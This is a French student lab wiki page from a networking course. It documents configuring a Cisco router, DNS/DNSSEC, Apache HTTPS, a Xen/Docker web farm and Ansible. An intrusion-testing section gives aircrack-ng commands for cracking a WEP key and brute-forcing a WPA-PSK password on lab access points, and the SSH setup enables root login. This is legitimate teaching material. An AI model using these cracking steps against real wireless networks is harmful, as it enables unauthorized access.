&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Sur notre machine virtuelle publique:&lt;br /&gt;
* On installe le *maitre* ansible.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52023</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52023"/>
				<updated>2020-01-05T16:14:28Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
